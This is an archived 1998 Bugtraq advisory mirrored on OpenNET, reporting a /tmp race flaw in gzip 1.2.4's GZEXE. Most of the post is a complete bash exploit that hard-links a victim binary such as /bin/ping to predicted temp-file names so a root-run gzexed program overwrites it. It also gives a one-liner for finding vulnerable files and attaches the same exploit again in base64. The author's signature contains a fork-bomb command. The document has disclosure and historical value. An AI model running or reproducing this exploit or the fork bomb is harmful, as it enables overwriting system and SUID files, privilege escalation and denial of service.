The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Выпущена CD-версия OpenNet.RU для оффлайн просмотра.
Для формирования заказа - перейдите по ссылке
.
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

GZEXE - the big problem


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Thu, 29 Jan 1998 11:32:17 +0500 (ESK)
Date: Wed, 28 Jan 1998 21:41:53 +0100
From: =?UNKNOWN-8BIT?Q?Micha=B3?= Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
To: BUGTRAQ@NETSPACE.ORG
Subject: GZEXE - the big problem

This is a multi-part message in MIME format.

------=_NextPart_000_004D_01BD2C35.8C227840
Content-Type: text/plain;
        charset="iso-8859-2"
Content-Transfer-Encoding: quoted-printable

** DESCRIPTION **

GZEXE, part of gzip package, is a small utility which allows
'transparent' compressio any kind of executables (just like pklite
under ms-dos). Unfortunatelly, it may be extremally dangerous. Here's
the shell script used to decompression:

if /usr/bin/tail +$skip $0 | "/usr/bin"/gzip -cd > /tmp/gztmp$$; then...
[...]                         ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
/tmp/gztmp$$ ${1+"$@"}; res=3D$?
^^^^^^^^^^^^

Just look at this... An example of badly-written one ;) It's possible
to overwrite any file (including SUIDs!) with code of gzexed executable
when root executes it... Then, this unwanted suid may be easily =
exploited.
It's also possible to enforce execution of OUR OWN code instead of=20
gzexed program, just by choosing as a victim any file not owned by
user running vunerable executables, but writable by him/her. This
file (even setuid) may be freely modified by attacker... Whoops!

** EXPLOIT **

-- GZEXE EXPLOIT --
#!/bin/bash
# GZEXE executables exploit (gzip 1.2.4)
# by Michal Zalewski (lcamtuf@staszic.waw.pl)
# ---------------------------------------------

VICTIM=3D/bin/ping
GZEXED=3Da.out

# Note: to locate gzexed executables you may use this:
# find / -type f -exec grep "/tmp/gztmp\\\$\\\$ \\\$" {} \; -print|cut =
-f 1 -d " "

if [ ! -f $VICTIM ]; then
  echo "I can't find my victim ($VICTIM)..."
  exit 0
fi

ORIG=3D`ls -l $VICTIM|awk '{print \$5}'`

echo "GZEXE exploit launched against $VICTIM ($ORIG bytes)."

renice +20 $PPID >&/dev/null
cd /tmp
touch $GZEXED

while :; do

  START=3D`ps|awk '$6=3D=3D"ps"{print $1}'`
 =20
  let START=3DSTART+100
  let DO=3DSTART+100

  while [ "$START" -lt "$DO" ]; do
    ln $VICTIM gztmp$START &>/dev/null
    let START=3DSTART+1
  done

  sleep 10
  rm -f gztmp* &>/dev/null

  NOWY=3D`ls -l $VICTIM|awk '{print \$5}'`

  if [ ! "$ORIG" =3D "$NOWY" ]; then
    echo "Done, my master."
    exit 0
  fi
 =20
done
-- EOF --

It may be left in background, just like my gcc-exploit-2. Please
verify vunerable executable filename (GZEXED - you may specify more
than one file, separated by spaces).

** FIX **

DO NOT USE GZEXE TO COMPRESS EXECUTABLES.
That's all, TMPDIR will NOT help in this case.

_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
=3D------- [ echo -e "while :;do \$0&\ndone">_;chmod +x _;./_ ] =
--------=3D





------=_NextPart_000_004D_01BD2C35.8C227840
Content-Type: application/octet-stream;
        name="gzexeploit"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
        filename="gzexeploit"

IyEvYmluL2Jhc2gKCiMgR1pFWEUgZXhlY3V0YWJsZXMgZXhwbG9pdCAoZ3ppcCAxLjIuNCkKIyBi
eSBNaWNoYWwgWmFsZXdza2kgKGxjYW10dWZAc3Rhc3ppYy53YXcucGwpCiMgLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tCgpWSUNUSU09L2Jpbi9waW5nCkdaRVhF
RD1hLm91dAoKIyBOb3RlOiB0byBsb2NhdGUgZ3pleGVkIGV4ZWN1dGFibGVzIHlvdSBtYXkgdXNl
IHRoaXM6CiMgZmluZCAvIC10eXBlIGYgLWV4ZWMgZ3JlcCAiL3RtcC9nenRtcFxcXCRcXFwkIFxc
XCQiIHt9IFw7IC1wcmludHxjdXQgLWYgMSAtZCAiICIKCmlmIFsgISAtZiAkVklDVElNIF07IHRo
ZW4KICBlY2hvICJJIGNhbid0IGZpbmQgbXkgdmljdGltICgkVklDVElNKS4uLiIKICBleGl0IDAK
ZmkKCk9SSUc9YGxzIC1sICRWSUNUSU18YXdrICd7cHJpbnQgXCQ1fSdgCgplY2hvICJHWkVYRSBl
eHBsb2l0IGxhdW5jaGVkIGFnYWluc3QgJFZJQ1RJTSAoJE9SSUcgYnl0ZXMpLiIKCnJlbmljZSAr
MjAgJFBQSUQgPiYvZGV2L251bGwKCmNkIC90bXAKCnRvdWNoICRHWkVYRUQKCndoaWxlIDo7IGRv
CgogIFNUQVJUPWBwc3xhd2sgJyQ2PT0icHMie3ByaW50ICQxfSdgCiAgCiAgbGV0IFNUQVJUPVNU
QVJUKzEwMAogIGxldCBETz1TVEFSVCsxMDAKCiAgd2hpbGUgWyAiJFNUQVJUIiAtbHQgIiRETyIg
XTsgZG8KICAgIGxuICRWSUNUSU0gZ3p0bXAkU1RBUlQgJj4vZGV2L251bGwKICAgIGxldCBTVEFS
VD1TVEFSVCsxCiAgZG9uZQoKICBzbGVlcCAxMAoKICBybSAtZiBnenRtcCogJj4vZGV2L251bGwK
CiAgTk9XWT1gbHMgLWwgJFZJQ1RJTXxhd2sgJ3twcmludCBcJDV9J2AKCiAgaWYgWyAhICIkT1JJ
RyIgPSAiJE5PV1kiIF07IHRoZW4KICAgIGVjaG8gIkRvbmUsIG15IG1hc3Rlci4iCiAgICBleGl0
IDAKICBmaQogIApkb25lCg==

------=_NextPart_000_004D_01BD2C35.8C227840--

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList
RB2 Network.
RB2 Network.